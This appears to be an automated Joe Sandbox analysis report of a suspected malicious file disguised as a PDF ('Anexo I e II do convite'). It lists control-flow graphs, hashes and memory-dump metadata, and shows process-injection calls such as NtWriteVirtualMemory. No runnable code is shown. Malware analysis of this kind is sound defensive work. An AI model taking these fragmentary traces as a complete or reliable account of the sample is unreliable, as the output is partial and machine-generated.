                        control_flow_graph 404 20a70a8-20a70bd 405 20a70c3-20a70d8 404->405 406 20a73e7-20a7439 404->406 407 20a70de-20a713e 405->407 408 20a74b1-20a74ee 405->408 412 20a7508 406->412 407->408 415 20a7144-20a716d 407->415 413 20a750e-20a7a34 call 20adad0 call 20a796b call 20aba35 call 20aeebc 408->413 414 20a74f0-20a7506 408->414 455 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 413->455 456 20a8a32-20a8b3d call 20aeebc * 3 413->456 414->412 417 20a745e-20a74af 415->417 418 20a7173-20a71cd 415->418 417->412 418->417 423 20a71d3-20a71e7 418->423 423->417 425 20a71ed-20a7210 423->425 425->417 427 20a7216-20a7270 425->427 427->417 430 20a7276-20a72d2 427->430 430->417 434 20a72d8-20a7334 430->434 434->408 438 20a733a-20a7394 434->438 438->417 442 20a739a-20a73b1 438->442 442->417 444 20a73b7-20a73e5 442->444 444->406 444->417 455->456 487 20a7f06-20a7fd3 455->487 490 20a7fd9-20a80ce call 20aeebc 487->490 491 20a0f3e-20a0f60 call 20a0d4c 487->491 490->456 498 20a80d4-20a829f 490->498 498->413 503 20a82a5-20a8383 call 20aeebc 498->503 503->456 508 20a8389-20a83e9 503->508 508->456 510 20a83ef-20a8425 508->510 511 20a848c-20a84b7 510->511 512 20a8427-20a8486 510->512 511->456 514 20a84bd-20a85f2 511->514 512->456 512->511 518 20a85f8-20a8713 call 20ac2a3 514->518 519 20afaae-20afab2 514->519 518->456 528 20a8719-20a881c call 20afaae NtWriteVirtualMemory 518->528 521 20afab3-20afb3c 519->521 527 20afb42-20afb44 521->527 528->456 533 20a8822-20a88f2 call 20aeebc 528->533 533->456 538 20a88f8-20a89c1 call 20aeebc 533->538 538->456 543 20a89c3-20a89fd call 20aeebc 538->543
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0wYf$FSVC$Nx|M$g{
                        • API String ID: 0-1260265311
                        • Opcode ID: 9cb44457d1859c61bff4fd2cff177aa5407d2cfb6a5d4d9e313739013b3ba4d3
                        • Instruction ID: 12656ada9fff011ad827408b22e03350d350b40136004b0c7feeea0d45209058
                        • Opcode Fuzzy Hash: 9cb44457d1859c61bff4fd2cff177aa5407d2cfb6a5d4d9e313739013b3ba4d3
                        • Instruction Fuzzy Hash: D172CFB2608349DFCB748E69CD657EEBBB2FF54300F95812ADD8A9B610D3705A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AD02E, Relevance: 7.9, APIs: 1, Strings: 3, Instructions: 932COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 546 20ad02e-20ad110 call 20abaaa 553 20ad112-20ad175 546->553 555 20ad17b-20ad18a 553->555 556 20a0f3e-20a0f60 call 20a0d4c 553->556 558 20ad190-20ad1e6 555->558 559 20ada11-20ada13 555->559 562 20a750e-20a7a34 call 20adad0 call 20a796b call 20aba35 call 20aeebc 558->562 563 20ad1ec-20ad1ff 558->563 615 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 562->615 616 20a8a32-20a8b3d call 20aeebc * 3 562->616 563->559 565 20ad205-20ad376 563->565 565->553 575 20ad37c-20ad3a9 565->575 577 20ad498-20ad516 575->577 578 20ad3af-20ad3c1 575->578 588 20ad51c-20ad54a 577->588 578->577 580 20ad3c7-20ad421 578->580 580->577 586 20ad423-20ad449 580->586 586->577 589 20ad44b-20ad45d 586->589 588->553 591 20ad550-20ad555 588->591 589->577 593 20ad45f 589->593 591->588 592 20ad557-20ad5a6 591->592 597 20ad5a8-20ad5b5 592->597 593->553 597->553 600 20ad5bb-20ad5bf 597->600 600->597 602 20ad5c1-20ad6cb call 20abf67 600->602 614 20ad6cd-20ad6d4 602->614 614->597 617 20ad6da-20ad6dd 614->617 615->616 654 20a7f06-20a7fd3 615->654 617->614 620 20ad6df-20ad6e9 617->620 620->614 623 20ad6eb-20ad743 call 20ac6df call 20ad748 620->623 623->559 654->556 657 20a7fd9-20a80ce call 20aeebc 654->657 657->616 662 20a80d4-20a829f 657->662 662->562 667 20a82a5-20a8383 call 20aeebc 662->667 667->616 672 20a8389-20a83e9 667->672 672->616 674 20a83ef-20a8425 672->674 675 20a848c-20a84b7 674->675 676 20a8427-20a8486 674->676 675->616 678 20a84bd-20a85f2 675->678 676->616 676->675 682 20a85f8-20a8713 call 20ac2a3 678->682 683 20afaae-20afab2 678->683 682->616 692 20a8719-20a881c call 20afaae NtWriteVirtualMemory 682->692 685 20afab3-20afb3c 683->685 691 20afb42-20afb44 685->691 692->616 697 20a8822-20a88f2 call 20aeebc 692->697 697->616 702 20a88f8-20a89c1 call 20aeebc 697->702 702->616 707 20a89c3-20a89fd call 20aeebc 702->707
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 0wYf$FSVC$Nx|M
                        • API String ID: 1029625771-3280496369
                        • Opcode ID: c88917507de309ca288c6ae6a3aea0ad2690b22164aa654a7162840ee23fa766
                        • Instruction ID: c4743650cdc1d7088182b368e62e84362883ed093e2f7d0d7c620c8a555b2693
                        • Opcode Fuzzy Hash: c88917507de309ca288c6ae6a3aea0ad2690b22164aa654a7162840ee23fa766
                        • Instruction Fuzzy Hash: B082FEB1608389DFCB748F68C9A57EE77B2FF55300F95812ADC8A9B610D3705A81CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A4364, Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 792COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 710 20a4364-20a43ab 712 20a43ad-20a43e2 710->712 713 20a4354-20a435a 710->713 716 20a4434-20a446a call 20a9461 712->716 717 20a43e4-20aad91 712->717 714 20a433c-20a4353 713->714 715 20a435c 713->715 714->713 724 20a44bb-20a44f1 716->724 725 20a446c-20a4473 716->725 721 20aad96-20aadde call 20aa4ae 717->721 722 20aad91 call 20a43f1 717->722 733 20a750e-20a7a34 call 20adad0 call 20a796b call 20aba35 call 20aeebc 721->733 734 20aade4-20aae7f 721->734 722->721 724->733 727 20a44b6 725->727 728 20a4475-20a4485 call 20ab165 725->728 731 20a44b7-20a44b8 727->731 728->731 731->724 762 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 733->762 763 20a8a32-20a8b3d call 20aeebc * 3 733->763 762->763 794 20a7f06-20a7fd3 762->794 797 20a7fd9-20a80ce call 20aeebc 794->797 798 20a0f3e-20a0f60 call 20a0d4c 794->798 797->763 805 20a80d4-20a829f 797->805 805->733 810 20a82a5-20a8383 call 20aeebc 805->810 810->763 815 20a8389-20a83e9 810->815 815->763 817 20a83ef-20a8425 815->817 818 20a848c-20a84b7 817->818 819 20a8427-20a8486 817->819 818->763 821 20a84bd-20a85f2 818->821 819->763 819->818 825 20a85f8-20a8713 call 20ac2a3 821->825 826 20afaae-20afab2 821->826 825->763 835 20a8719-20a881c call 20afaae NtWriteVirtualMemory 825->835 828 20afab3-20afb3c 826->828 834 20afb42-20afb44 828->834 835->763 840 20a8822-20a88f2 call 20aeebc 835->840 840->763 845 20a88f8-20a89c1 call 20aeebc 840->845 845->763 850 20a89c3-20a89fd call 20aeebc 845->850
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0wYf$FSVC$Nx|M
                        • API String ID: 0-3280496369
                        • Opcode ID: 6339a579a62c8c00796d91b3ed9d4ef4be562f328798ff9a1ac1a70d198c9b0e
                        • Instruction ID: 48c206e9b769e68c220d449692b3d16de574a1cbf80a85ee63b95c2a9cb33d4b
                        • Opcode Fuzzy Hash: 6339a579a62c8c00796d91b3ed9d4ef4be562f328798ff9a1ac1a70d198c9b0e
                        • Instruction Fuzzy Hash: 3372DEB2608389DFCB748F78C9657EE7BB2BF55310F95812ADC8A9B250D3705A41CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AF7D5, Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 770COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 853 20af7d5-20af7d9 854 20af7dc-20af7f0 853->854 854->854 855 20af7f2-20af843 854->855 857 20af849-20af8b5 855->857 858 20a750e-20a7a34 call 20adad0 call 20a796b call 20aba35 call 20aeebc 855->858 865 20af8b8-20af8cb call 20a0692 857->865 924 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 858->924 925 20a8a32-20a8b3d call 20aeebc * 3 858->925 870 20afa8f-20afaab 865->870 871 20af8d1-20af90c 865->871 875 20abaaa-20abbd2 871->875 876 20af912-20af91c 871->876 890 20abbd8-20abcbf call 20ac6df call 20abcce 875->890 891 20abcc2-20abcc5 LoadLibraryA call 20abcce 875->891 876->870 879 20af922-20af926 876->879 879->870 882 20af92c-20af930 879->882 882->870 885 20af936-20af93a 882->885 885->870 888 20af940-20af944 885->888 888->870 892 20af94a-20af94e 888->892 890->891 899 20abcca-20abccd 891->899 892->870 896 20af954-20af98c 892->896 896->858 904 20af992-20af99c 896->904 899->865 904->870 907 20af9a2-20af9b3 904->907 908 20af9b4-20af9f7 907->908 914 20af9f9-20af9fd 908->914 915 20afa06-20afa8c 908->915 914->870 918 20afa03-20afa04 914->918 918->908 924->925 956 20a7f06-20a7fd3 924->956 959 20a7fd9-20a80ce call 20aeebc 956->959 960 20a0f3e-20a0f60 call 20a0d4c 956->960 959->925 967 20a80d4-20a829f 959->967 967->858 972 20a82a5-20a8383 call 20aeebc 967->972 972->925 977 20a8389-20a83e9 972->977 977->925 979 20a83ef-20a8425 977->979 980 20a848c-20a84b7 979->980 981 20a8427-20a8486 979->981 980->925 983 20a84bd-20a85f2 980->983 981->925 981->980 987 20a85f8-20a8713 call 20ac2a3 983->987 988 20afaae-20afab2 983->988 987->925 997 20a8719-20a87e2 call 20afaae NtWriteVirtualMemory 987->997 990 20afab3-20afb3c 988->990 996 20afb42-20afb44 990->996 1001 20a8814-20a881c 997->1001 1001->925 1002 20a8822-20a88f2 call 20aeebc 1001->1002 1002->925 1007 20a88f8-20a89c1 call 20aeebc 1002->1007 1007->925 1012 20a89c3-20a89fd call 20aeebc 1007->1012
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0wYf$FSVC$Nx|M
                        • API String ID: 0-3280496369
                        • Opcode ID: 60a7aa521787a993ebb80323118f3b3155838dcdb99a2da560e64b8d5d13b6ad
                        • Instruction ID: c913fdf4ca19655547566a7239f5a4f52dbbcf88e3f814dae4b48b1c1c5b4e23
                        • Opcode Fuzzy Hash: 60a7aa521787a993ebb80323118f3b3155838dcdb99a2da560e64b8d5d13b6ad
                        • Instruction Fuzzy Hash: 0D62EDB1608389DFCB748F68C9657EE7BB2BF58300F95812EDC8A9B250D3705A41CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AB645, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 723COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1015 20ab645-20ab728 1021 20a750e-20a7a34 call 20adad0 call 20a796b call 20aba35 call 20aeebc 1015->1021 1022 20ab72e-20ab86b call 20ab90b 1015->1022 1053 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 1021->1053 1054 20a8a32-20a8b3d call 20aeebc * 3 1021->1054 1053->1054 1085 20a7f06-20a7fd3 1053->1085 1088 20a7fd9-20a80ce call 20aeebc 1085->1088 1089 20a0f3e-20a0f60 call 20a0d4c 1085->1089 1088->1054 1096 20a80d4-20a829f 1088->1096 1096->1021 1101 20a82a5-20a8383 call 20aeebc 1096->1101 1101->1054 1106 20a8389-20a83e9 1101->1106 1106->1054 1108 20a83ef-20a8425 1106->1108 1109 20a848c-20a84b7 1108->1109 1110 20a8427-20a8486 1108->1110 1109->1054 1112 20a84bd-20a85f2 1109->1112 1110->1054 1110->1109 1116 20a85f8-20a8713 call 20ac2a3 1112->1116 1117 20afaae-20afab2 1112->1117 1116->1054 1126 20a8719-20a881c call 20afaae NtWriteVirtualMemory 1116->1126 1119 20afab3-20afb3c 1117->1119 1125 20afb42-20afb44 1119->1125 1126->1054 1131 20a8822-20a88f2 call 20aeebc 1126->1131 1131->1054 1136 20a88f8-20a89c1 call 20aeebc 1131->1136 1136->1054 1141 20a89c3-20a89fd call 20aeebc 1136->1141
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0wYf$FSVC$Nx|M
                        • API String ID: 0-3280496369
                        • Opcode ID: 453afe6ebe86a6a970efcf493d1911f86a77b6531a729266a20c24431052e55e
                        • Instruction ID: b87a7ea4182a6e5ecf53f92eeab0ecb7e2d5cdadf3c9294fe83116c65ca5f11b
                        • Opcode Fuzzy Hash: 453afe6ebe86a6a970efcf493d1911f86a77b6531a729266a20c24431052e55e
                        • Instruction Fuzzy Hash: 0962CBB1608389DFCB749E68CD657EEBBB2FF54300F95812ADC8A9B210D3745A41CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7552, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 685COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1144 20a7552-20a7565 1145 20a7566-20a7a34 call 20adad0 call 20a796b call 20aba35 call 20aeebc 1144->1145 1167 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 1145->1167 1168 20a8a32-20a8b3d call 20aeebc * 3 1145->1168 1167->1168 1199 20a7f06-20a7fd3 1167->1199 1202 20a7fd9-20a80ce call 20aeebc 1199->1202 1203 20a0f3e-20a0f60 call 20a0d4c 1199->1203 1202->1168 1210 20a80d4-20a829f 1202->1210 1215 20a750e-20a754d 1210->1215 1216 20a82a5-20a8383 call 20aeebc 1210->1216 1215->1145 1216->1168 1222 20a8389-20a83e9 1216->1222 1222->1168 1224 20a83ef-20a8425 1222->1224 1225 20a848c-20a84b7 1224->1225 1226 20a8427-20a8486 1224->1226 1225->1168 1228 20a84bd-20a85f2 1225->1228 1226->1168 1226->1225 1232 20a85f8-20a8713 call 20ac2a3 1228->1232 1233 20afaae-20afab2 1228->1233 1232->1168 1242 20a8719-20a881c call 20afaae NtWriteVirtualMemory 1232->1242 1235 20afab3-20afb3c 1233->1235 1241 20afb42-20afb44 1235->1241 1242->1168 1247 20a8822-20a88f2 call 20aeebc 1242->1247 1247->1168 1252 20a88f8-20a89c1 call 20aeebc 1247->1252 1252->1168 1257 20a89c3-20a89fd call 20aeebc 1252->1257
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 0wYf$FSVC$Nx|M
                        • API String ID: 1029625771-3280496369
                        • Opcode ID: 3c9f7a766b8bc15cc1b588f25dd784f30311cbc65be0b016b117e59b8b0459aa
                        • Instruction ID: aae4922ae93e23e280bbfac074133a4a2dda054f4977a8861c31e9a907604541
                        • Opcode Fuzzy Hash: 3c9f7a766b8bc15cc1b588f25dd784f30311cbc65be0b016b117e59b8b0459aa
                        • Instruction Fuzzy Hash: 3752BBB1608389DFCB749F68C9657EEBBB2FF54300F95812ADD8A9B210D3745A41CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7643, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 669COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0wYf$FSVC$Nx|M
                        • API String ID: 0-3280496369
                        • Opcode ID: 77bc0c2ccfcf14f830cc59dab75a69326d0f7a86707fb1938ad4cc422e015fb1
                        • Instruction ID: 89be81e6a683a4c2a3cc5ea184264be0216aa8fa9ca191298fb1b23883b31d2b
                        • Opcode Fuzzy Hash: 77bc0c2ccfcf14f830cc59dab75a69326d0f7a86707fb1938ad4cc422e015fb1
                        • Instruction Fuzzy Hash: 4052CBB2608389DFCB749F68C9557EEBBB2FF54300F95812ADD8A9B210D3745A41CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A76B3, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 637COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1260 20a76b3-20a76b5 1261 20a76b8-20a7a34 call 20adad0 call 20a796b call 20aba35 call 20aeebc 1260->1261 1280 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 1261->1280 1281 20a8a32-20a8b3d call 20aeebc * 3 1261->1281 1280->1281 1312 20a7f06-20a7fd3 1280->1312 1315 20a7fd9-20a80ce call 20aeebc 1312->1315 1316 20a0f3e-20a0f60 call 20a0d4c 1312->1316 1315->1281 1323 20a80d4-20a829f 1315->1323 1328 20a750e-20a7686 1323->1328 1329 20a82a5-20a8383 call 20aeebc 1323->1329 1328->1261 1329->1281 1338 20a8389-20a83e9 1329->1338 1338->1281 1340 20a83ef-20a8425 1338->1340 1341 20a848c-20a84b7 1340->1341 1342 20a8427-20a8486 1340->1342 1341->1281 1344 20a84bd-20a85f2 1341->1344 1342->1281 1342->1341 1348 20a85f8-20a8713 call 20ac2a3 1344->1348 1349 20afaae-20afab2 1344->1349 1348->1281 1358 20a8719-20a881c call 20afaae NtWriteVirtualMemory 1348->1358 1351 20afab3-20afb3c 1349->1351 1357 20afb42-20afb44 1351->1357 1358->1281 1363 20a8822-20a88f2 call 20aeebc 1358->1363 1363->1281 1368 20a88f8-20a89c1 call 20aeebc 1363->1368 1368->1281 1373 20a89c3-20a89fd call 20aeebc 1368->1373
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 0wYf$FSVC$Nx|M
                        • API String ID: 1029625771-3280496369
                        • Opcode ID: a8dfdcc63340c78409defd96432d96c34db948fa7d285519e25651a134150c0b
                        • Instruction ID: 1acf9db91116cb4ecad9967e6198b0087cd30cca40f0fc827492d686fa6530e3
                        • Opcode Fuzzy Hash: a8dfdcc63340c78409defd96432d96c34db948fa7d285519e25651a134150c0b
                        • Instruction Fuzzy Hash: 9152BAB1608389DFCB749F68C9657EEBBB2FF54300F95812ADD8A9B210D3705A41CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7723, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 622COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1376 20a7723-20a7781 1377 20a77b3-20a7a34 call 20a796b call 20aba35 call 20aeebc 1376->1377 1392 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 1377->1392 1393 20a8a32-20a8b3d call 20aeebc * 3 1377->1393 1392->1393 1424 20a7f06-20a7fd3 1392->1424 1427 20a7fd9-20a80ce call 20aeebc 1424->1427 1428 20a0f3e-20a0f60 call 20a0d4c 1424->1428 1427->1393 1435 20a80d4-20a829f 1427->1435 1440 20a750e-20a7781 call 20adad0 1435->1440 1441 20a82a5-20a8383 call 20aeebc 1435->1441 1440->1377 1441->1393 1451 20a8389-20a83e9 1441->1451 1451->1393 1455 20a83ef-20a8425 1451->1455 1457 20a848c-20a84b7 1455->1457 1458 20a8427-20a8486 1455->1458 1457->1393 1460 20a84bd-20a85f2 1457->1460 1458->1393 1458->1457 1464 20a85f8-20a8713 call 20ac2a3 1460->1464 1465 20afaae-20afab2 1460->1465 1464->1393 1474 20a8719-20a881c call 20afaae NtWriteVirtualMemory 1464->1474 1467 20afab3-20afb3c 1465->1467 1473 20afb42-20afb44 1467->1473 1474->1393 1479 20a8822-20a88f2 call 20aeebc 1474->1479 1479->1393 1484 20a88f8-20a89c1 call 20aeebc 1479->1484 1484->1393 1489 20a89c3-20a89fd call 20aeebc 1484->1489
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 0wYf$FSVC$Nx|M
                        • API String ID: 1029625771-3280496369
                        • Opcode ID: 7d3481d0999fd7b42204d211c01b155179473fd08f1b8a97152372069056e8bb
                        • Instruction ID: 87e2beba6079666c418e169465f64122290a387717fda4a581dd4ba06494d047
                        • Opcode Fuzzy Hash: 7d3481d0999fd7b42204d211c01b155179473fd08f1b8a97152372069056e8bb
                        • Instruction Fuzzy Hash: 2F42BAB1608389DFCB749F68C9657EEBBB2FF54300F95812ADD8A9B210D3705A41CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A77B8, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 609COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1492 20a77b8-20a77d7 1493 20a7809-20a7a34 call 20a796b call 20aba35 call 20aeebc 1492->1493 1507 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 1493->1507 1508 20a8a32-20a8b3d call 20aeebc * 3 1493->1508 1507->1508 1539 20a7f06-20a7fd3 1507->1539 1542 20a7fd9-20a80ce call 20aeebc 1539->1542 1543 20a0f3e-20a0f60 call 20a0d4c 1539->1543 1542->1508 1550 20a80d4-20a829f 1542->1550 1555 20a750e-20a77d7 call 20adad0 1550->1555 1556 20a82a5-20a8383 call 20aeebc 1550->1556 1555->1493 1556->1508 1566 20a8389-20a83e9 1556->1566 1566->1508 1570 20a83ef-20a8425 1566->1570 1572 20a848c-20a84b7 1570->1572 1573 20a8427-20a8486 1570->1573 1572->1508 1575 20a84bd-20a85f2 1572->1575 1573->1508 1573->1572 1580 20a85f8-20a8713 call 20ac2a3 1575->1580 1581 20afaae-20afab2 1575->1581 1580->1508 1590 20a8719-20a881c call 20afaae NtWriteVirtualMemory 1580->1590 1583 20afab3-20afb3c 1581->1583 1589 20afb42-20afb44 1583->1589 1590->1508 1595 20a8822-20a88f2 call 20aeebc 1590->1595 1595->1508 1600 20a88f8-20a89c1 call 20aeebc 1595->1600 1600->1508 1605 20a89c3-20a89fd call 20aeebc 1600->1605
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: FSVC$Nx|M
                        • API String ID: 1029625771-3345918652
                        • Opcode ID: d9d13d7fe6b049d2ac4d46d31c06929b62a55319d8b1fd58dfd7a410cdb51f5c
                        • Instruction ID: b43fc5d2080cbed22d95caa2430b12ae5ae15b8e431c16538f2a74ca28aab757
                        • Opcode Fuzzy Hash: d9d13d7fe6b049d2ac4d46d31c06929b62a55319d8b1fd58dfd7a410cdb51f5c
                        • Instruction Fuzzy Hash: AF42BCB16083899FDB749E68CDA57EE7BB2FF58300F85812ADD8A9B210D3705A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A7807, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 599COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1608 20a7807 1609 20a7809-20a7a34 call 20a796b call 20aba35 call 20aeebc 1608->1609 1623 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 1609->1623 1624 20a8a32-20a8b3d call 20aeebc * 3 1609->1624 1623->1624 1655 20a7f06-20a7fd3 1623->1655 1658 20a7fd9-20a80ce call 20aeebc 1655->1658 1659 20a0f3e-20a0f60 call 20a0d4c 1655->1659 1658->1624 1666 20a80d4-20a829f 1658->1666 1671 20a750e-20a77d7 call 20adad0 1666->1671 1672 20a82a5-20a8383 call 20aeebc 1666->1672 1671->1609 1672->1624 1682 20a8389-20a83e9 1672->1682 1682->1624 1686 20a83ef-20a8425 1682->1686 1688 20a848c-20a84b7 1686->1688 1689 20a8427-20a8486 1686->1689 1688->1624 1691 20a84bd-20a85f2 1688->1691 1689->1624 1689->1688 1696 20a85f8-20a8713 call 20ac2a3 1691->1696 1697 20afaae-20afab2 1691->1697 1696->1624 1706 20a8719-20a881c call 20afaae NtWriteVirtualMemory 1696->1706 1699 20afab3-20afb3c 1697->1699 1705 20afb42-20afb44 1699->1705 1706->1624 1711 20a8822-20a88f2 call 20aeebc 1706->1711 1711->1624 1716 20a88f8-20a89c1 call 20aeebc 1711->1716 1716->1624 1721 20a89c3-20a89fd call 20aeebc 1716->1721
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: FSVC$Nx|M
                        • API String ID: 1029625771-3345918652
                        • Opcode ID: 0b4800911cabcaba7479359e633faf9abda7d3cf6f1f3cf635db1841948539bc
                        • Instruction ID: 34e698bf1fafb525712e55fda476a08b683210aeba5d6bdfd743d790f49a471e
                        • Opcode Fuzzy Hash: 0b4800911cabcaba7479359e633faf9abda7d3cf6f1f3cf635db1841948539bc
                        • Instruction Fuzzy Hash: 4042ACB16083899FDB749F68CDA57EE7BB2FF58300F85812ADD8A9B210D3745A41CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A788B, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 580COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1724 20a788b-20a788d 1725 20a7890-20a7a34 call 20a796b call 20aba35 call 20aeebc 1724->1725 1738 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 1725->1738 1739 20a8a32-20a8b3d call 20aeebc * 3 1725->1739 1738->1739 1770 20a7f06-20a7fd3 1738->1770 1773 20a7fd9-20a80ce call 20aeebc 1770->1773 1774 20a0f3e-20a0f60 call 20a0d4c 1770->1774 1773->1739 1781 20a80d4-20a829f 1773->1781 1786 20a750e-20a785e call 20adad0 1781->1786 1787 20a82a5-20a8383 call 20aeebc 1781->1787 1786->1725 1787->1739 1797 20a8389-20a83e9 1787->1797 1797->1739 1801 20a83ef-20a8425 1797->1801 1803 20a848c-20a84b7 1801->1803 1804 20a8427-20a8486 1801->1804 1803->1739 1806 20a84bd-20a85f2 1803->1806 1804->1739 1804->1803 1812 20a85f8-20a8713 call 20ac2a3 1806->1812 1813 20afaae-20afab2 1806->1813 1812->1739 1822 20a8719-20a881c call 20afaae NtWriteVirtualMemory 1812->1822 1815 20afab3-20afb3c 1813->1815 1821 20afb42-20afb44 1815->1821 1822->1739 1827 20a8822-20a88f2 call 20aeebc 1822->1827 1827->1739 1832 20a88f8-20a89c1 call 20aeebc 1827->1832 1832->1739 1837 20a89c3-20a89fd call 20aeebc 1832->1837
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
